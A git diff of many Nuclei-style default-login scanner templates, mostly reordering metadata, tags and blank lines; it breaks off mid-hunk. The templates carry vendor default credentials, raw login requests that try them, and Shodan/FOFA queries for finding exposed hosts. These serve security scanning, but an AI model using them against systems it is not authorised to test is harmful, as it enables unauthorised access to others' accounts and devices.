a/http/default-logins/netsus/netsus-default-login.yaml b/http/default-logins/netsus/netsus-default-login.yaml index 1d199530aa..b92ec14da3 100644 --- a/http/default-logins/netsus/netsus-default-login.yaml +++ b/http/default-logins/netsus/netsus-default-login.yaml @@ -22,6 +22,7 @@ http: Content-Type: application/x-www-form-urlencoded loginwith=suslogin&username={{username}}&password={{password}}&submit= + attack: pitchfork payloads: username: diff --git a/http/default-logins/nexus/nexus-default-login.yaml b/http/default-logins/nexus/nexus-default-login.yaml index b8dc1fbf4e..2a8cbf4930 100644 --- a/http/default-logins/nexus/nexus-default-login.yaml +++ b/http/default-logins/nexus/nexus-default-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: nexus,default-login metadata: max-request: 1 + tags: nexus,default-login http: - raw: @@ -35,6 +35,7 @@ http: - type: status status: - 204 + - type: word words: - "Server: Nexus" diff --git a/http/default-logins/nps/nps-default-login.yaml b/http/default-logins/nps/nps-default-login.yaml index 2a28e8871c..93aa3fab20 100644 --- a/http/default-logins/nps/nps-default-login.yaml +++ b/http/default-logins/nps/nps-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: nps,default-login metadata: max-request: 1 + tags: nps,default-login http: - raw: @@ -39,12 +39,14 @@ http: - "application/json" part: header condition: and + - type: word words: - '"msg": "login success"' - '"status": 1' part: body condition: and + - type: status status: - 200 diff --git a/http/default-logins/nsicg/nsicg-default-login.yaml b/http/default-logins/nsicg/nsicg-default-login.yaml index 1260ab4e0d..b3263f57eb 100644 --- a/http/default-logins/nsicg/nsicg-default-login.yaml +++ b/http/default-logins/nsicg/nsicg-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: "NS-ICG" tags: nsicg,default-login @@ -27,7 +27,6 @@ http: Content-Type: application/x-www-form-urlencoded usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree= - - | @timeout: 25s GET /user/main HTTP/1.1 @@ -40,7 +39,6 @@ http: - ns25000 password: - ns25000 - cookie-reuse: true req-condition: true matchers: diff --git a/http/default-logins/o2oa/o2oa-default-login.yaml b/http/default-logins/o2oa/o2oa-default-login.yaml index 3c3c31bf41..79ebce3925 100755 --- a/http/default-logins/o2oa/o2oa-default-login.yaml +++ b/http/default-logins/o2oa/o2oa-default-login.yaml @@ -7,9 +7,9 @@ info: description: | O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises. metadata: + verified: true max-request: 1 shodan-query: title=="O2OA" - verified: true tags: o2oa,default-login http: @@ -47,4 +47,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/octobercms/octobercms-default-login.yaml b/http/default-logins/octobercms/octobercms-default-login.yaml index cd3e2e36fb..1f45442382 100644 --- a/http/default-logins/octobercms/octobercms-default-login.yaml +++ b/http/default-logins/octobercms/octobercms-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: http.component:"October CMS" tags: octobercms,default-login,oss @@ -24,7 +24,6 @@ http: GET /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/ofbiz/ofbiz-default-login.yaml b/http/default-logins/ofbiz/ofbiz-default-login.yaml index 3ffca88876..0cf9d7aff8 100644 --- a/http/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/http/default-logins/ofbiz/ofbiz-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ofbiz,default-login,apache metadata: max-request: 1 + tags: ofbiz,default-login,apache http: - raw: @@ -30,7 +30,6 @@ http: password: - ofbiz attack: pitchfork - matchers: - type: word words: diff --git a/http/default-logins/openemr/openemr-default-login.yaml b/http/default-logins/openemr/openemr-default-login.yaml index 349cb79ebf..4d1ca2df33 100644 --- a/http/default-logins/openemr/openemr-default-login.yaml +++ b/http/default-logins/openemr/openemr-default-login.yaml @@ -3,8 +3,8 @@ id: openemr-default-login info: name: OpenEMR - Default Admin Discovery author: Geekby - description: OpenEMR default admin credentials were discovered. severity: high + description: OpenEMR default admin credentials were discovered. reference: - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image classification: @@ -13,8 +13,8 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - fofa-query: app="OpenEMR" shodan-query: http.html:"OpenEMR" + fofa-query: app="OpenEMR" tags: openemr,default-login http: diff --git a/http/default-logins/openmediavault/openmediavault-default-login.yaml b/http/default-logins/openmediavault/openmediavault-default-login.yaml index b83f2cd2fe..c3127b3d54 100644 --- a/http/default-logins/openmediavault/openmediavault-default-login.yaml +++ b/http/default-logins/openmediavault/openmediavault-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"OpenMediaVault" tags: default-login,openmediavault @@ -32,8 +32,8 @@ http: - admin password: - openmediavault - cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/oracle/businessintelligence-default-login.yaml b/http/default-logins/oracle/businessintelligence-default-login.yaml index 3f4b8c3094..9b71b0c082 100644 --- a/http/default-logins/oracle/businessintelligence-default-login.yaml +++ b/http/default-logins/oracle/businessintelligence-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: oracle,default-login metadata: max-request: 1 + tags: oracle,default-login http: - raw: diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index c44b888289..8fce71c3e4 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 200 verified: true + max-request: 200 shodan-query: title:"Oracle PeopleSoft Sign-in" tags: default-login,peoplesoft,oracle,fuzz @@ -43,9 +43,9 @@ http: - "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG" body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG" + headers: Content-Type: application/x-www-form-urlencoded - attack: pitchfork payloads: username: @@ -70,8 +70,8 @@ http: - PSPY - HHR_JPM - HHR_CMP - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/others/aruba-instant-default-login.yaml b/http/default-logins/others/aruba-instant-default-login.yaml index 0c1b1e55dd..086ba97f35 100755 --- a/http/default-logins/others/aruba-instant-default-login.yaml +++ b/http/default-logins/others/aruba-instant-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" tags: aruba,default-login @@ -29,7 +29,6 @@ http: - admin password: - admin - host-redirects: true cookie-reuse: true matchers: @@ -37,4 +36,4 @@ http: dsl: - 'status_code_1 == 200' - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' - condition: and \ No newline at end of file + condition: and diff --git a/http/default-logins/others/ciphertrust-default-login.yaml b/http/default-logins/others/ciphertrust-default-login.yaml index 46a15ada48..3ce2449e6b 100755 --- a/http/default-logins/others/ciphertrust-default-login.yaml +++ b/http/default-logins/others/ciphertrust-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.thalesdocs.com/ctp/cm/2.6/get_started/deployment/initial-password/index.html#:~:text=The%20username%20of%20the%20initial,to%20%22admin%22%20in%20lowercase. metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0=" tags: default-login,ciphertrust @@ -29,7 +29,6 @@ http: - admin password: - admin - host-redirects: true cookie-reuse: true matchers: @@ -37,4 +36,4 @@ http: dsl: - 'status_code_1 == 401' - 'contains(body_1,"code") && contains(body_1,"message\":\"Password change required")' - condition: and \ No newline at end of file + condition: and diff --git a/http/default-logins/others/cnzxsoft-default-login.yaml b/http/default-logins/others/cnzxsoft-default-login.yaml index e28db30247..0ad19e19d6 100755 --- a/http/default-logins/others/cnzxsoft-default-login.yaml +++ b/http/default-logins/others/cnzxsoft-default-login.yaml @@ -7,9 +7,9 @@ info: description: | Cnzxsoft Golden Shield Information Security Management System has a default weak password. metadata: + verified: true max-request: 1 fofa-query: 'title=="中新金盾信息安全管理系统"' - verified: true tags: default-login,cnzxsoft http: @@ -28,10 +28,9 @@ http: password: - 'zxsoft1234!@#$' attack: pitchfork - matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")' - condition: and \ No newline at end of file + condition: and diff --git a/http/default-logins/others/inspur-clusterengine-default-login.yaml b/http/default-logins/others/inspur-clusterengine-default-login.yaml index 6cda053cbd..5ef3a43b22 100644 --- a/http/default-logins/others/inspur-clusterengine-default-login.yaml +++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml @@ -26,9 +26,9 @@ http: - admin|pwd password: - 123456 - host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/others/kingsoft-v8-default-login.yaml b/http/default-logins/others/kingsoft-v8-default-login.yaml index 441d7ecdd1..55f0f56e30 100644 --- a/http/default-logins/others/kingsoft-v8-default-login.yaml +++ b/http/default-logins/others/kingsoft-v8-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: kingsoft,default-login metadata: max-request: 1 + tags: kingsoft,default-login http: - raw: @@ -29,9 +29,9 @@ http: - admin password: - admin - host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/others/opencats-default-login.yaml b/http/default-logins/others/opencats-default-login.yaml index 9b224a1748..9dd978b262 100644 --- a/http/default-logins/others/opencats-default-login.yaml +++ b/http/default-logins/others/opencats-default-login.yaml @@ -10,8 +10,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: title:"opencats" tags: default-login,opencats @@ -36,13 +36,12 @@ http: - cats - password - john99 - host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - - type: word words: - 'OpenCATS - Home' diff --git a/http/default-logins/others/panabit-ixcache-default-login.yaml b/http/default-logins/others/panabit-ixcache-default-login.yaml index 8ef21a8fa8..7934dcc406 100644 --- a/http/default-logins/others/panabit-ixcache-default-login.yaml +++ b/http/default-logins/others/panabit-ixcache-default-login.yaml @@ -7,9 +7,9 @@ info: description: Panabit iXCache default admin login credentials were successful. reference: - http://forum.panabit.com/thread-10830-1-1.html - tags: default-login,ixcache,panabit metadata: max-request: 1 + tags: default-login,ixcache,panabit http: - raw: @@ -28,7 +28,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/default-logins/others/secnet-ac-default-login.yaml b/http/default-logins/others/secnet-ac-default-login.yaml index 2a139781ce..294ae7a1c8 100644 --- a/http/default-logins/others/secnet-ac-default-login.yaml +++ b/http/default-logins/others/secnet-ac-default-login.yaml @@ -7,9 +7,9 @@ info: description: secnet ac default admin credentials were successful. reference: - https://bbs.secnet.cn/post/t-30 - tags: default-login,secnet metadata: max-request: 1 + tags: default-login,secnet http: - raw: diff --git a/http/default-logins/others/supershell-default-login.yaml b/http/default-logins/others/supershell-default-login.yaml index 772fb5fb0f..ffe862cd56 100644 --- a/http/default-logins/others/supershell-default-login.yaml +++ b/http/default-logins/others/supershell-default-login.yaml @@ -10,8 +10,8 @@ info: - https://github.com/tdragon6/Supershell - https://www.ctfiot.com/129689.html metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="supershell" tags: supershell,default-login @@ -30,7 +30,6 @@ http: - tdragon6 password: - tdragon6 - host-redirects: true cookie-reuse: true matchers: @@ -38,4 +37,4 @@ http: dsl: - 'status_code_1 == 200 && !contains(body_1,"result\":\"failed")' - 'contains(header_1,"token=ey") && contains(body_1,"{\"result\":\"success")' - condition: and \ No newline at end of file + condition: and diff --git a/http/default-logins/others/telecom-gateway-default-login.yaml b/http/default-logins/others/telecom-gateway-default-login.yaml index cc9626e9a5..898bd31615 100644 --- a/http/default-logins/others/telecom-gateway-default-login.yaml +++ b/http/default-logins/others/telecom-gateway-default-login.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha severity: high description: Telecom Gateway default admin login credentials were successful. - tags: default-login,telecom,gateway metadata: max-request: 1 + tags: default-login,telecom,gateway http: - raw: @@ -23,9 +23,9 @@ http: - admin password: - admin - host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/paloalto/panos-default-login.yaml b/http/default-logins/paloalto/panos-default-login.yaml index 9ec775a354..adad892ef4 100644 --- a/http/default-logins/paloalto/panos-default-login.yaml +++ b/http/default-logins/paloalto/panos-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: panos,default-login metadata: max-request: 1 + tags: panos,default-login http: - raw: diff --git a/http/default-logins/panabit/panabit-default-login.yaml b/http/default-logins/panabit/panabit-default-login.yaml index 7493ebee79..c4b3b6d40f 100644 --- a/http/default-logins/panabit/panabit-default-login.yaml +++ b/http/default-logins/panabit/panabit-default-login.yaml @@ -14,10 +14,10 @@ info: cvss-score: 9.8 cwe-id: CWE-1391 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Panabit-智能网关" - tags: panabit,default-login + tags: panabit,default-login,intrusive http: - raw: diff --git a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml index 25b2fcd586..d87a197e9d 100644 --- a/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml +++ b/http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 16 verified: true + max-request: 16 shodan-query: http.title:phpMyAdmin tags: default-login,phpmyadmin @@ -22,7 +22,6 @@ http: - | GET /index.php HTTP/1.1 Host: {{Hostname}} - - | POST /index.php HTTP/1.1 Host: {{Hostname}} @@ -64,9 +63,9 @@ http: group: 1 regex: - "phpMyAdmin=([0-9a-z]+)" - req-condition: true stop-at-first-match: true + matchers-condition: and matchers: - type: dsl diff --git a/http/default-logins/powerjob-default-login.yaml b/http/default-logins/powerjob-default-login.yaml index 49a190a323..92b531e1b2 100644 --- a/http/default-logins/powerjob-default-login.yaml +++ b/http/default-logins/powerjob-default-login.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.yuque.com/powerjob/guidence/trial metadata: - fofa-query: title="PowerJob" + verified: true max-request: 1 shodan-query: http.title:"PowerJob" - verified: true + fofa-query: title="PowerJob" tags: powerjob,default-login http: diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml index 36eb044017..117abbb8f1 100644 --- a/http/default-logins/pyload/pyload-default-login.yaml +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"pyload" tags: default-login,pyload diff --git a/http/default-logins/rabbitmq/rabbitmq-default-login.yaml b/http/default-logins/rabbitmq/rabbitmq-default-login.yaml index 2efdf3f951..cd0bb3d513 100644 --- a/http/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/http/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: rabbitmq,default-login metadata: max-request: 1 + tags: rabbitmq,default-login http: - raw: @@ -36,10 +36,12 @@ http: words: - "application/json" part: header + - type: word words: - "{\"name\":\"guest\"" part: body + - type: status status: - 200 diff --git a/http/default-logins/rainloop/rainloop-default-login.yaml b/http/default-logins/rainloop/rainloop-default-login.yaml index 3f22a49cc3..4f45a1b82a 100644 --- a/http/default-logins/rainloop/rainloop-default-login.yaml +++ b/http/default-logins/rainloop/rainloop-default-login.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/RainLoop/rainloop-webmail/issues/28 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: app="RAINLOOP-WebMail" tags: default-login,rainloop,webmail,foss @@ -18,7 +18,6 @@ http: - | # Login Portal: /?admin GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 Host: {{Hostname}} - - | POST /?/Ajax/&q[]=/0/ HTTP/2 Host: {{Hostname}} @@ -30,11 +29,10 @@ http: payloads: user: - admin - pass: - 12345 - cookie-reuse: true + extractors: - type: regex name: token diff --git a/http/default-logins/rancher/rancher-default-login.yaml b/http/default-logins/rancher/rancher-default-login.yaml index 1a87b84a44..83a0c3285e 100644 --- a/http/default-logins/rancher/rancher-default-login.yaml +++ b/http/default-logins/rancher/rancher-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,rancher,kubernetes,devops,cloud metadata: max-request: 2 + tags: default-login,rancher,kubernetes,devops,cloud http: - raw: @@ -22,7 +22,6 @@ http: GET /v3/settings/first-login HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 - - | POST /v3-public/localProviders/local?action=login HTTP/1.1 Host: {{Hostname}} @@ -39,6 +38,7 @@ http: password: - admin attack: pitchfork + matchers-condition: and matchers: - type: status diff --git a/http/default-logins/ricoh/ricoh-weak-password.yaml b/http/default-logins/ricoh/ricoh-weak-password.yaml index 2fc1196279..d75d4bd803 100644 --- a/http/default-logins/ricoh/ricoh-weak-password.yaml +++ b/http/default-logins/ricoh/ricoh-weak-password.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: ricoh,default-login metadata: max-request: 1 + tags: ricoh,default-login http: - raw: diff --git a/http/default-logins/riello/netman-default-login.yaml b/http/default-logins/riello/netman-default-login.yaml index 97ace980bf..0e114e16fc 100644 --- a/http/default-logins/riello/netman-default-login.yaml +++ b/http/default-logins/riello/netman-default-login.yaml @@ -10,9 +10,9 @@ info: - https://www.riello-ups.com/ metadata: verified: "true" + max-request: 1 shodan-query: title:"Netman" censys-query: services.http.response.body:"Netman204" - max-request: 1 tags: default-login,netman http: diff --git a/http/default-logins/rockmongo/rockmongo-default-login.yaml b/http/default-logins/rockmongo/rockmongo-default-login.yaml index b9b42adac5..4c02e8ce5d 100644 --- a/http/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/http/default-logins/rockmongo/rockmongo-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: rockmongo,default-login metadata: max-request: 1 + tags: rockmongo,default-login http: - raw: @@ -34,7 +34,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Location: /index.php?action=admin.index&host=0" diff --git a/http/default-logins/rseenet/rseenet-default-login.yaml b/http/default-logins/rseenet/rseenet-default-login.yaml index cc7ab9c87a..64d6d0c20f 100644 --- a/http/default-logins/rseenet/rseenet-default-login.yaml +++ b/http/default-logins/rseenet/rseenet-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: rseenet,default-login metadata: max-request: 1 + tags: rseenet,default-login http: - raw: diff --git a/http/default-logins/ruckus/ruckus-wireless-default-login.yaml b/http/default-logins/ruckus/ruckus-wireless-default-login.yaml index 88c6219c61..b3198024b3 100644 --- a/http/default-logins/ruckus/ruckus-wireless-default-login.yaml +++ b/http/default-logins/ruckus/ruckus-wireless-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 9.8 cwe-id: CWE-1391 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ruckus" tags: default-login,router,ruckus @@ -32,10 +32,10 @@ http: - super password: - sp-admin - host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/samsung/samsung-printer-default-login.yaml b/http/default-logins/samsung/samsung-printer-default-login.yaml index cd2eeaf102..e3661d8174 100644 --- a/http/default-logins/samsung/samsung-printer-default-login.yaml +++ b/http/default-logins/samsung/samsung-printer-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SyncThru Web Service" tags: default-login,iot,samsung,printer diff --git a/http/default-logins/samsung/samsung-wlan-default-login.yaml b/http/default-logins/samsung/samsung-wlan-default-login.yaml index 72c9720619..2e84515491 100644 --- a/http/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/http/default-logins/samsung/samsung-wlan-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: samsung,default-login metadata: max-request: 1 + tags: samsung,default-login http: - raw: diff --git a/http/default-logins/seeddms/seeddms-default-login.yaml b/http/default-logins/seeddms/seeddms-default-login.yaml index c12e09ef29..e15063b1a4 100644 --- a/http/default-logins/seeddms/seeddms-default-login.yaml +++ b/http/default-logins/seeddms/seeddms-default-login.yaml @@ -31,8 +31,8 @@ http: - admin password: - admin - attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/seeyon/seeyon-a8-default-login.yaml b/http/default-logins/seeyon/seeyon-a8-default-login.yaml index 961286d77b..a952d7134a 100755 --- a/http/default-logins/seeyon/seeyon-a8-default-login.yaml +++ b/http/default-logins/seeyon/seeyon-a8-default-login.yaml @@ -7,9 +7,9 @@ info: description: | Seeyon (seeyon) OA A8+ Enterprise Edition has a weak password vulnerability, which can be used to log in to the background metadata: + verified: true max-request: 1 fofa-query: app="致远互联-OA" - verified: true tags: seeyon,oa,default-login http: diff --git a/http/default-logins/seeyon/seeyon-monitor-default-login.yaml b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml index 6d808d5735..b0763b467f 100755 --- a/http/default-logins/seeyon/seeyon-monitor-default-login.yaml +++ b/http/default-logins/seeyon/seeyon-monitor-default-login.yaml @@ -10,9 +10,9 @@ info: - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/default-pwd/seeyon-a8-management-monitor-default-password.yaml metadata: + verified: true max-request: 1 fofa-query: app="致远互联-OA" - verified: true tags: seeyon,oa,default-login http: @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -38,4 +39,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml index ec524a099a..88b1b4562a 100644 --- a/http/default-logins/sequoiadb/sequoiadb-default-login.yaml +++ b/http/default-logins/sequoiadb/sequoiadb-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,sequoiadb metadata: max-request: 1 + tags: default-login,sequoiadb http: - raw: diff --git a/http/default-logins/showdoc/showdoc-default-login.yaml b/http/default-logins/showdoc/showdoc-default-login.yaml index 4bf0099a39..adac2717e8 100644 --- a/http/default-logins/showdoc/showdoc-default-login.yaml +++ b/http/default-logins/showdoc/showdoc-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: showdoc,default-login metadata: max-request: 1 + tags: showdoc,default-login http: - raw: @@ -33,7 +33,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"username":"showdoc"' diff --git a/http/default-logins/smartbi/smartbi-default-login.yaml b/http/default-logins/smartbi/smartbi-default-login.yaml index b6cf8d519c..8d472320ec 100755 --- a/http/default-logins/smartbi/smartbi-default-login.yaml +++ b/http/default-logins/smartbi/smartbi-default-login.yaml @@ -11,9 +11,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-default-user-weakpass.yaml - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: app="SMARTBI" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="SMARTBI" tags: smartbi,default-login http: @@ -34,10 +34,9 @@ http: - system - service - public - attack: pitchfork - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -54,4 +53,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/solarwinds/solarwinds-default-login.yaml b/http/default-logins/solarwinds/solarwinds-default-login.yaml index 868a60ad68..d024c0a22a 100644 --- a/http/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/http/default-logins/solarwinds/solarwinds-default-login.yaml @@ -11,21 +11,19 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: solarwinds,default-login metadata: max-request: 2 + tags: solarwinds,default-login # Optional: # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} - http: - raw: - | GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username)}} - - | GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 Host: {{Hostname}} @@ -42,12 +40,14 @@ http: words: - "Content-Type: application/json" part: header + - type: regex regex: - "(totalRow|result|swi)s(:\\/\\/)?" - "(Orion\\.|Poller(ID)?)s?" condition: and part: body + - type: status status: - 200 diff --git a/http/default-logins/sonarqube/sonarqube-default-login.yaml b/http/default-logins/sonarqube/sonarqube-default-login.yaml index 1a8e033d59..bce0ef4c35 100644 --- a/http/default-logins/sonarqube/sonarqube-default-login.yaml +++ b/http/default-logins/sonarqube/sonarqube-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: title:"Sonarqube" tags: default-login,sonarqube @@ -35,7 +35,6 @@ http: password: - sonar - admin - matchers: - type: dsl dsl: diff --git a/http/default-logins/spectracom/spectracom-default-login.yaml b/http/default-logins/spectracom/spectracom-default-login.yaml index cedc84ed45..0ce4778600 100644 --- a/http/default-logins/spectracom/spectracom-default-login.yaml +++ b/http/default-logins/spectracom/spectracom-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: spectracom,default-login metadata: max-request: 1 + tags: spectracom,default-login http: - raw: diff --git a/http/default-logins/steve/steve-default-login.yaml b/http/default-logins/steve/steve-default-login.yaml index 720161877b..fc4bc73a4a 100644 --- a/http/default-logins/steve/steve-default-login.yaml +++ b/http/default-logins/steve/steve-default-login.yaml @@ -11,11 